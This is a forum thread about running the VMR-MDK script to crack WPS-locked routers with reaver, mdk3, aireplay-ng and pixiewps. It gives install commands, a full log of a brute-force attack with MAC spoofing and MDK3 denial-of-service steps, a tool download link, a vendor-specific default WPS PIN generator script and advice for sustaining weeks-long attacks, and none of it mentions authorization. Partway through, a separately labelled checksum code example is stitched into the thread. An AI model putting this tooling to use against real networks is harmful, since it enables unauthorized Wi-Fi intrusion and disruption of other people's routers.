Is it possible to run VMR-MDK on a Raspberry Pi running Raspbian ?

I've got everything working fine (aircrack, reaver 1.5.2, pixiewps, wash, etc).

Thanks
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 25, 2015, 01:43:44 pm
You could try running it. We know nothing about your OS. You could just download kali2.0 and make a persistent USB install of kali and run it from a flash drive. In the Kali linux forums MTeams have posted step by step procedures for setting up a persistent USB. Just do not try and run it from a live-only, non-persistent USB.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: brunoaduarte on November 25, 2015, 02:29:57 pm
Ok, I'll try to run it on Raspbian (Debian based) Raspberry OS.

There's a version of Kali for Raspberry (ARM), but it doesn't have the drivers for my MT7601U USB wireless dongle, and I was not able to compile its firmware.

Anyway, thanks ! I'll post here if it worked.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 26, 2015, 04:21:02 am
MTeams will try and help you get it running. We suspect even if you have all the drivers and programs you are going to get folder warnings, especially when you run reaver, as the program refers to locations that may not exist in your operating system. You will find the --session= command in the reaver command lines, and these locations may not exist in your OS. Furthermore, a lot of the setups use locations in kali to store text files temporarily. Again, the persistent USB solution will be far easier.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: brunoaduarte on November 26, 2015, 01:52:07 pm
I've tested it here, seems to work ok !

I just needed to install some extra dependencies that were not installed by default in Raspbian: xterm, rfkill and macchanger.

Here's how to make it work on Raspberry Pi running Raspbian:
------------------------------------------------------------------------

Code:
pi@raspberrypi ~ $ sudo su
root@raspberrypi:/home/pi#

#Install needed dependencies
apt-get update && apt-get install libpcap-dev libssl-dev libsqlite3-dev xterm rfkill macchanger -y

#Install Pixiewps
git clone https://github.com/wiire/pixiewps.git
cd pixiewps/src
make && make install

#Install Reaver 1.5.2
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x*/src/
./configure
make && make install

Then just follow tutorial from VMR-MDK help file.

* If there are problems running 'xterm' as root, fix using these steps (couldn't paste the original link here because it was detected as spam):
Code:
Tuesday, January 7, 2014
X11 doesn't work with sudo su -
Here is the situation:

login as: pkg
Using keyboard-interactive authentication.
Password:
Last login: Tue Jan  7 22:02:07 2014 from l2554
Kickstarted on 2012-10-19
/usr/bin/xauth:  creating new authority file /home/pkg/.Xauthority

[pkg@mdc3 ~]$xterm - works
[pkg@mdc3 ~]$sudo su -

[root@mdc3 ]# xterm - doesn't work
PuTTY X11 proxy: wrong authorisation protocol attempted
Warning: This program is an suid-root program or is being run by the root user. The full text of the error or warning message cannot be safely formatted
in this environment. You may get a more descriptive message by running the
program as a non-root user or by removing the suid bit on the executable.
xterm Xt error: Can't open display: %s


Here is what you have to do
su - pkg -c "xauth list"  | xargs -n 3 xauth add


Basically we have to add the xauth created by user "pkg" to this new user "root"

[pkg@mdc3vr1138 ~]$ xauth list
mdc3vr1138/unix:10  MIT-MAGIC-COOKIE-1  d9241397a36b9ecc2cb03b07addf4008

[root@mdc3vr1138 ~]# xauth add mdc3vr1138/unix:10  MIT-MAGIC-COOKIE-1  d9241397a36b9ecc2cb03b07addf4008

And here's the full log of it running:

Code:

=~=~=~=~=~=~=~=~=~=~=~= PuTTY log 2015.11.26 12:01:21 =~=~=~=~=~=~=~=~=~=~=~=
login as: pi
pi@192.168.1.119's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 26 14:00:05 2015


pi@raspberrypi ~ $ sudo su

root@raspberrypi:/home/pi# cd
root@raspberrypi:~# airmon-ng check kill
root@raspberrypi:~# ./VMR-MDK-K2-011x8.sh

 VMR-MDK-K2-011x8.sh(Kali2.0 Only)

                            |||||||||||||||||||||||||
                            || WPS PIN  JAIL BREAK ||
                            |||||||||||||||||||||||||

            In Memory of Alan M. Turing and the work of Betchly Park
    If you eliminate the wrong solutions you are left with the right answer.

                 All Thanks To Vulpi, Wn722, Slim 76, Soxrok2212

                       Inspired By The Band SRC
                      Next To Milestones On The Plain Of Jars
                        In Undertaking This Work We Were
                  Up All Night Near The Hall Of The Mountain King

                    A Musket Team Special Case WPS Pin Harvester
                           !!!!USE WITH KALI 2.0 ONLY!!!!
             Read Help Comments in configfiledetailed Before Employing

     --> MANUALLY REMOVE THRU A TERMINAL WINDOW ANY MONITORS MADE WITH<--
     --> THE NEWER AIRMON-NG (i.e. wlan0mon etc) BEFORE PROCEEDING <--
     --> Network Manager will be stopped to allow reaver to function<--
                              Press (y/Y) to continue....
         Press (n/N) to abort!!..Press any other key to try again:
y
  You entered y.  Continuing ...


  Clearing ALL monitors, reaver, wash, mdk3 and aireplay-ng etc - please wait.
    Shutting down network-manager


Interface       Chipset         Driver

wlan0           Unknown         mt7601u - [phy0]

Interface



Interface       Chipset         Driver

wlan0           Unknown         mt7601u - [phy0]


 Devices found by airmon-ng.
 
       1: wlan0

    Enter the line number of the wireless device (i.e. wlan0, wlan1 etc) to be used.
  Device must support packet injection.

   Enter Line Number Here: 1


  You entered wlan0 type (y/Y) to confirm or (n/N) to try again.
y

    Do you wish to boost your wifi device power to 30dBm?
  This routine works for the AWUSO36H and
  may work with other devices.
  Type (y/Y) for yes or (n/N) for no.
n



Interface       Chipset         Driver

wlan0           Unknown         mt7601u - [phy0]
mon0            Unknown         mt7601u - [phy0]


 Devices found by airmon-ng.
 
       1: wlan0
       2: mon0

    What wireless monitor interface (i.e. mon0, mon1) will
  be used by reaver?

   Enter Line Number Here: 2


  You entered mon0 type (y/Y) to confirm or (n/N) to try again.
y
    Running wash scan target for targetAP selection.

                         FOR AUTOMATIC ENTRY

    When scan is complete and targetAP's seen enter (y/Y) to continue...
   Program will display AP list and load selected target data automatically.

                          FOR MANUAL ENTRY
                          (Special  Cases)

    If targetAP has a hidden ESSID(i.e. no AP name seen) or,
  targetAP NOT FOUND you may enter information manually.
  Enter (m/M) to enter the AP name, mac address and channel manually.

   [y/Y] To select targetAP from a wash  scan list of APs seen enter: [y/Y]

   [m/M] To enter targetAP data manually (i.e. special cases) select: [m/M]

     Enter y/Y or m/M
y

    You have chosen y.

 Enter (y/Y) to confirm or (n/N) to try again.
y
 

 TargetAPs found by wash.
 
       1: targetap   
 
      !!! A specific config file will be written for each target !!!

     When the targetAP is selected, the script will write a configuration
  file to the /root/VARMAC_CONFIG/ folder. The file name will be
  the AP name(ESSID) followed by the mac address(BSSID). If the file exists,
  the file will NOT be overwritten.
     Using individual files for each target will avoid conflicts with reaver
  and help keep attack parameters consistent. For example, using and
  then not using  --dh-small/-S will cause reaver to reset the pin
  count. The entire attack will be restarted and all previous work will be
  lost.


   Enter Line Number of Selected TargetAP Here: 1




    You have chosen:

      1.  targetap as the targetAPs' name.

      2.  XX:XX:XX:XX:XX:XX as the targetAPs' mac address.

 Enter (y/Y) to confirm or (n/N) to try again.
y
 

 Configuration files listed in the VARMAC_CONFIG folder.
 
       1: configfiledetailed
       2: targetap-FFFFFFFFFFFF

     Select the config file to be used.
  A Configuration file targetap-FFFFFFFFFFFF has been made for use
  with this target BUT any config file listed can be used.
  After selection the config file parameters will appear. You can review
  settings and make changes which will be written to the file choosen.

     Once the program is running, open the config file with leafpad,
  make any changes and save. The config file is loaded at the start of
  Stages II, III & IV.

   Enter Line Number of Config File Here: 2



    You have chosen targetap-FFFFFFFFFFFF as your configuration file.
 Enter (y/Y) to confirm or (n/N) to try again.
y

    Check Entries - To change, enter the line number of the parameter to alter and
  follow program prompts. The entry changed will be written to targetap-FFFFFFFFFFFF.

  1) Channel 0 (Zero in almost all cases)   default= 0   [ 0 ]
  2) Use -r x:y with reaver (y/n)           default= y   [ y ]
  3) x in -r x:y (number of times)          default= 2   [ 2 ]
  4) y in -r x:y in sec                     default= 15  [ 15 ]
  5) Reaver Live Time in sec(Stage II)      default= 120 [ 120 ]
  6) Use Long Reaver Command y/n            default= y   [ y ]
  7) MDK Attack Type 0-15(Stage III)        default= 4   [ 14 ]
  8) Time in sec MDK3 is active(Stage III)  default= 15  [ 15 ]
  9) Router Reset w/ Wash in sec(Stage IV)  default= 120 [ 90 ]
  10) Reaver countdown timer(Stage II) y/n  default= y   [ y ]
  11) MDK3 countdown timer(Stage III) y/n   default= n   [ y ]
  12) WASH countdown timer(Stage IV) y/n    default= y   [ y ]
  13) Dampen MDK3(Stage III) y/n            default= y   [ y ]
  14) Advanced Scanning in sec y/n          default= 120 [ 120 ]
  15) Aireplay --fakeauth(Stage I/II) y/n   default= y   [ y ]
  16) Aireplay --Deauth(Stage I/II) y/n     default= n   [ n ]
  17) Use --dhsmall Reaver(Stage I/II) y/n  default= y   [ y ]
  18) Enter spoof mac address y/n           default= n   [ n ]
  19) Mac address to spoof in hex AA:BC:DD:33:22:11     [ 94:39:E5:D7:28:95 ]
  20) Use Pixiewps1.1(Stage IV) y/n         default= y   [ y ]
  21) Retest WPS pin 12345670 y/n           default= y   [ y ]
  22) Retest pin 12345670 every x cycles    default= 10  [ 50 ]
      c/C)ontinue
c

   The configuration file:
        /root/VARMAC_CONFIG/targetap-FFFFFFFFFFFF
             is loading......
  The file can be changed with leafpad anytime. Make your changes and save.
  The file is reloaded at the start of Stage II,III and IV.
    If no error messages are seen above press (y/Y) to continue....
  If error messages ARE SEEN enter (n/N) and correct the errors.

    Enter y/Y or n/N
y

  How many times do you want the program to cycle thru the targetAP? (COUNT)

     !!!!Enter a number less then 100,000!!!!
1000

  You entered 1000 type (y/Y) to confirm or (n/N) to try again.
y



    Do you wish to use a default or known WPS Pin against the targetAP?

  Select (y/Y) to use a specific WPS Pin.

  --> Enter  (n/N) to brute force all 11,000 pins.<--

  For help on this subject enter (h/H).
  !!!WARNING if you select (y/Y) read the help files FIRST!!!
n

  You entered n type (y/Y) to confirm or (n/N) to try again.
y
  Assigning a random mac address to wlan0.
Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       f6:fe:b6:59:e7:19 (unknown)
  Assigning wlan0 mac address to mon0.
Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       f6:fe:b6:59:e7:19 (unknown)


Interface       Chipset         Driver

wlan0           Unknown         mt7601u - [phy0]
(monitor mode enabled on mon1)
mon0            Unknown         mt7601u - [phy0]

Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
[ERROR] Could not change MAC: interface up or insufficient permissions: Device or resource busy


Interface       Chipset         Driver

wlan0           Unknown         mt7601u - [phy0]
(monitor mode enabled on mon2)
mon0            Unknown         mt7601u - [phy0]
mon1            Unknown         mt7601u - [phy0]

Current MAC:   7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
Permanent MAC: 7c:dd:90:xx:xx:xx (Shenzhen Ogemray Technology Co., Ltd.)
New MAC:       fe:4b:2b:f9:80:af (unknown)
 
 Program is starting please standby......
 
             Starting Reaver
 TargetAP Name                      = targetap
 Monitor                            = mon0
 Channel(note 0 = channel hopping)  = 1
 Mac code of Target AP              = XX:XX:XX:XX:XX:XX
 Random Mac code                    = f6:fe:b6:59:e7:19 
 Reaver live time                   = 90 sec
 Reaver start/stop cycles remaining = 1000
 Recurring-delay pin attempts x     = 2 x
 Recurring-delay sleep in sec y     = 15 sec
 Text Log in   /root/VARMAC_LOGS    = targetap-151126-14:06-0001
 Maximum Reaver Prescanning Time    = 120 sec
 Using Config File/root/VARMAC_CONFIG/targetap-FFFFFFFFFFFF
 Router Pause/Recovery Time         = 90 sec
 MDK3 Attack Time                   = 15 sec
 MDK3 Attack Type 14 = DOS1/DOS2/Invalid SSID3
 Monitor WPS Pin Collection - Adjust Reaver Live Time Accordingly!!!

    Starting Stage I
  1. Scanning targetap-151126-14:06-0001 for AP activity(Stage I).

  2. Scanning targetap-151126-14:06-0001 for AP activity(Stage I).

 Stage II Started - Reaver live time remaining.  00:01:29


Only error I've got is this (not sure if it's critical though):

Code:
[ERROR] Could not change MAC: interface up or insufficient permissions: Device or resource busy
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on November 26, 2015, 04:09:20 pm
Try Kali.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 27, 2015, 06:09:47 am
To brunoaduarte

    Ref the error code: sometimes during the macchanging routines the wifi device lags behind the program in its response and an error occurs. We had to place a lot of sleep 2 commands in the macchanging module to get it to run on slow persistent usb machines and long 5 meter wifi usb extension cables. But to be fair we are only guessing here.

     If you develop a method to run this program you should write up the step by step procedures and place them in forums dedicated to your OS.

     As far as we can see the script is functioning, but we would also need to see the xterm window output.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 25, 2016, 12:59:54 pm
Due to changes in text output for such dependencies as ifconfig, VMR-MDK was rewritten to accept both Kali 2.0 and Kali 2016.1Rolling.

You can download VMR-MDK-K2-2016R-011x9.zip package at

http://www.datafilehost.com/d/fd192b6d

Musket Teams

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Henk on January 28, 2016, 11:04:01 am
Due to changes in text output for such dependencies as ifconfig, VMR-MDK was rewritten to accept both Kali 2.0 and Kali 2016.1Rolling.

You can download VMR-MDK-K2-2016R-011x9.zip package at

http://www.datafilehost.com/d/fd192b6d

Musket Teams
Thanks guys for the great work!
However I'm still facing the "No such File or directory" trouble although I've installed the 32 libs in Kali 2.0.
Hope I could get some help about this  ;D
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: meffovic on January 29, 2016, 05:13:42 pm
Due to changes in text output for such dependencies as ifconfig, VMR-MDK was rewritten to accept both Kali 2.0 and Kali 2016.1Rolling.

You can download VMR-MDK-K2-2016R-011x9.zip package at

http://www.datafilehost.com/d/fd192b6d

Musket Teams
Thanks guys for the great work!
However I'm still facing the "No such File or directory" trouble although I've installed the 32 libs in Kali 2.0.
Hope I could get some help about this  ;D

I had the same problem.
The only way I could solve this, was to unpack the zip in the /root/ directory,
if you do this it will work.

Good luck!
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: osys on March 01, 2016, 10:06:33 am
Got working on Kali Rolling with Locked AP TL-WR842ND. Not too much to wait though  ;)
Pin and Key were the same: 45576072

Confirmed working, Thanks!
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: devilsadvocate on March 06, 2016, 03:41:55 am
The script seems to work, but a couple of modifications are needed.

1. The "wash" command needs to have an option that takes fcs into account.  There is a switch with the wash command, "--ignore-fcs", that needs to be used sometimes in order to get the correct output from wash.  Consider adding that option in the config file.  Modifying the script was easy enough for me to figure out though.

2. Consider adding more documentation on the default wps pins that are generated.  Certain vendors' conversion schemes (like from MAC address to pin; e.g. Hitron) could be documented.

3. A quick install script for the live version of Kali would be nice.

4. Also, "make clean" needs to be one of the steps for the installation of the custom mdk3 version that comes with this.

For a beta, this is good.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kcdtv on March 06, 2016, 12:23:52 pm
Quote
2. Consider adding more documentation on the default wps pins that are generated.  Certain vendors conversion schemes (like from MAC address to pin; e.g. Hitron) could be documented.

Well, speaking about that....
  @ Muskett

I would have really appreciated that you gave the credits correctly, as this part is literally a copy-paste of my script....

Code:
############## Start Of WPSPIN-1.3 Default Pin Generater ##############

ESSID=$(echo $NAME1)
BSSID=$(echo $MACALNUM)

FUNC_CHECKSUM(){
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`

PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`

RESTE=`expr $ACCUM '%' 10`
 }

CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')

FINBSSID=$(echo $BSSID | cut -d ':' -f4-)

MAC=$(echo $FINBSSID | tr -d ':')

CONVERTEDMAC=$(printf '%d\n' 0x$MAC)

FINESSID=$(echo $ESSID | cut -d '-' -f2)

PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')

CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')

MACESSID=$(echo $PAREMAC$FINESSID)

STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`

PIN=`expr 10 '*' $STRING`

FUNC_CHECKSUM

PINWPS1=$(printf '%08d\n' $PIN)

STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`

FUNC_CHECKSUM

PINWPS2=$(printf '%08d\n' $PIN)

STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`

FUNC_CHECKSUM

PINWPS3=$(printf '%08d\n' $PIN)

if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];

then

CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)

RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`

STRING4=`expr $RAIZ '+' 7`

PIN=`expr 10 '*' $STRING4`

FUNC_CHECKSUM

PINWPS4=$(printf '%08d\n' $PIN)

echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS4  "
PIN4REAVER=$PINWPS4
else
case $CHECKBSSID in
04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1 
$info"  Other Possible Pin"$info:$yel $PINWPS2 
$info"  Other Possible Pin"$info:$yel $PINWPS3"
PIN4REAVER=$PINWPS1
;;
001915)
echo -e "$info"  Other Possible Pin"$info:$yel 12345670"
PIN4REAVER=12345670
;;
404A03)
echo -e "$info"  Other Possible Pin"$info:$yel 11866428"
PIN4REAVER=11866428
;;
F43E61 | 001FA4)
echo -e "$info"  Other Possible Pin"$info:$yel 12345670"
PIN4REAVER=12345670
;;
001A2B)
if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$info"  Other Possible Pin"$info:$yel 88478760"
PIN4REAVER=88478760
else
echo -e "PIN POSSIBLE... > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
3872C0)
if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$info"  Other Possible Pin"$info:$yel 18836486"
PIN4REAVER=18836486
else
echo -e "PIN POSSIBLE    > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
FCF528)
echo -e "$info"  Other Possible Pin"$info:$yel 20329761"
PIN4REAVER=20329761
;;
3039F2)
echo -e "  several possible PINs, ranked in order> 
 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
A4526F)
echo -e "  several possible PINs, ranked in order> 
 16538061 88202907 73767053 16702738 43297917 18355604 "
PIN4REAVER=16538061
;;
74888B)
echo -e "  several possible PINs, ranked in order> 
 43297917 73767053 88202907 16538061 16702738 18355604"
PIN4REAVER=43297917
;;
DC0B1A)
echo -e "  several possible PINs, ranked in order> 
 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1 "
PIN4REAVER=$PINWPS1
;;
002275)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
08863B)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
001CDF)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
00A026)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
5057F0)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
C83A35 | 00B00C | 081075)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
E47CF9 | 801F02)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
0022F7)
##echo -e "$info"  Other Possible Pin"$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
;;
*)
##echo -e $info"  Other Possible Pin$info:$yel $PINWPS1"
PIN4REAVER=$PINWPS1
echo -e "$txtrst"
;;
esac

fi

  It is not called "WPSPIN default PIN generator" (that's another one) but WPSPIN.
And I asked specifically to not remove the original annotations in the checksum function that was written by antares...
  I hope you change this, otherwise I would report this thread here and in the Kali forum for not respecting GPL v3 and ask the administrators to remove it.
Sorry for being kind of a jerk, nothing personal and it is not about having my name somewhere, I really don't give a sh... but I am tired of seeing my code used and used over without any credits.
It is just a matter of principles.
It is not difficult to give credits when you copy paste code, and if you would do so devilsadvocate and other users could go to the source and find all the information they need about the supported devices, the history of the discovery of this breach etc...
Have a good Sunday and please my dear Muskett: respect free code ;)
(For the record and if anyone doubts what I say, they can download the 1.3 version code here http://www.crack-wifi.com/forum/img/members/1840/WPSPIN.zip and read the thread where it was published: http://www.crack-wifi.com/forum/topic-8793-wpspin-generateur-pin-wps-par-defaut-routeurs-huawei-belkin.html)
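The two accumulations in FUNC_CHECKSUM above are the WPS PIN checksum from the WPS specification: the first seven digits weighted 3,1,3,1,3,1,3 give the check digit, and a well-formed eight-digit PIN has all eight digits weighted 3,1,...,3,1 summing to a multiple of 10. As an added example (not code from this thread or from WPSPIN), here are the same two steps as POSIX sh functions, which also give a way to confirm that a PIN is well-formed before it is trusted; the sample prefixes are constructed from PINs that appear above.

```shell
# Added example, not code from the thread or from WPSPIN: the WPS PIN
# checksum that FUNC_CHECKSUM implements with expr, as plain POSIX sh.
# A WPS PIN is 8 digits; weighting the digits 3,1,3,1,3,1,3,1 from the
# left, a well-formed PIN has a weighted sum that is a multiple of 10.

# Weighted digit sum of a digit string, weights alternating 3,1,3,1,... from the left.
wps_weighted_sum() {
    rest=$1
    sum=0
    w=3
    while [ -n "$rest" ]; do
        d=$(printf '%.1s' "$rest")   # first character
        rest=${rest#?}               # drop it
        sum=$((sum + w * d))
        if [ "$w" -eq 3 ]; then w=1; else w=3; fi
    done
    echo "$sum"
}

# Check digit for a 7-digit prefix (the first accumulation in FUNC_CHECKSUM).
wps_checksum_digit() {
    case "$1" in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) echo "wps_checksum_digit: need exactly 7 digits" >&2; return 1 ;;
    esac
    s=$(wps_weighted_sum "$1")
    echo $(( (10 - s % 10) % 10 ))
}

# Full 8-digit PIN from a 7-digit prefix; appending the check digit to a
# 7-digit prefix gives the same result as the script's printf '%08d'.
wps_pin_from_prefix() {
    c=$(wps_checksum_digit "$1") || return 1
    printf '%s%s\n' "$1" "$c"
}

# Exit status 0 if PIN is 8 digits with weighted sum 0 mod 10
# (the second accumulation, RESTE, in FUNC_CHECKSUM).
wps_pin_valid() {
    case "$1" in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    s=$(wps_weighted_sum "$1")
    [ $((s % 10)) -eq 0 ]
}

# Constructed demo: the reaver starting PIN and two fixed PINs from the script.
for prefix in 1234567 8847876 1883648; do
    printf '%s -> %s\n' "$prefix" "$(wps_pin_from_prefix "$prefix")"
done
for pin in 12345670 12345678; do
    if wps_pin_valid "$pin"; then echo "$pin: well-formed"; else echo "$pin: bad checksum"; fi
done
```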
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 03:47:54 pm
To kcdtv,

    Thanks for pointing out our error. We found the routine embedded in another script. For the record NONE of the pin routines were written by Musket Teams.  And we did not download it from the source. The only alterations we made were to the pin output and we certainly did not alter the checksum functions you mentioned.
   We will be happy to give you credit for whatever you say is yours or remove the entire WPS pin module at your request whenever we issue an update. Great work by the way and we do not think you are wrong here.

Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 04:20:19 pm
To devilsadvocate

    You can easily patch the wash output to meet your requirements by adding -C to the lines of code indicated below.

If you are using
VMR-MDK-K2-2016R-011x9.sh

Line 5077

xterm -g 100x30-1+1 -T "wash" -e "wash -i $MON -C 2>&1 | tee VARMAC_WASH/wash.01.txt" &

Line 7901

xterm -g 100x30-1+1 -T "wash" -e "wash -i $MON -C 2>&1 | tee VARMAC_WASH/wash.01.txt" &

If you are using Kali 1.10a, the program uses Eterm instead of xterm. In the K2 version the code line numbers will be different. If you have any problem, post your version and we will post the patch for you.

    We are not sure what the make clean command would do to the placement of mdk3. We will have to consult the author of the C program.

    Reference documentation: we did not even know what you meant until kcdtv explained it to us, as the source was unknown. We copied the program from another script posted here. As kcdtv has posted the source he/she probably can give the latest status on default pin generators better than us.

    We do not think the program could be run live, as these attacks can go on for weeks and the pin counts have to be saved. This would be lost between reboots.
 
    Thanks for your input.

     Musket Teams
 
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: devilsadvocate on March 06, 2016, 06:10:05 pm
    We do not think the program could be run live, as these attacks can go on for weeks and the pin counts have to be saved. This would be lost between reboots.

Saving the data across reboots is easy enough.  Since I run the Kali OS from a live usb drive, I can copy all of the relevant directories and scripts to a second flash drive.  I simply copy /root/VARMAC* and /etc/reaver to my second flash drive (the drive that doesn't boot Kali) as well as your script which I have modified (just the wash command).  There are some other items under /root that I also copy, like WPSpin.py and easybox_wps.py for example.

Every time I boot Kali from a live USB, I simply restore that data to their respective locations.  After I reinstall the custom mdk3, I'm good to go.  This is what I mean by an install script for the live version of Kali.

Also, I would like to report some behavior that I have witnessed on some Netgear APs.  It seems that some Netgear APs are aware that Reaver always starts with the code, "12345670".  The result of this is that those routers will WPS lock right away.  I haven't found a workaround yet (if there even is one).  I realize that a mod to Reaver may be necessary.  Is there a version of Reaver that doesn't use "12345670" right from the start?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kcdtv on March 06, 2016, 09:09:00 pm
Good evening Musket team
  Sorry if I was not very nice with you in my previous message  :D
 I was kind of surprised to see my old code as I was checking out which algorithm you did use, and I was even more surprised to see this kind of behaviour in one of your works
  I understand now why it happened...   :P
  There is absolutely no problem to use my script, I chose to publish it as a bash script under GPL3 for that.  :)
  If you don't mind, I would like you to replace the line
Code:
############## Start Of WPSPIN-1.3 Default Pin Generater ##############
by this one
Code:
############## Start Of WPSPIN-1.3 by kcdtv for www.crack-wifi.com ##############
And that you add some comment on the line where you declare the function for checksum (some lines after)
Instead of

Code:
FUNC_CHECKSUM(){
Something like this
Code:
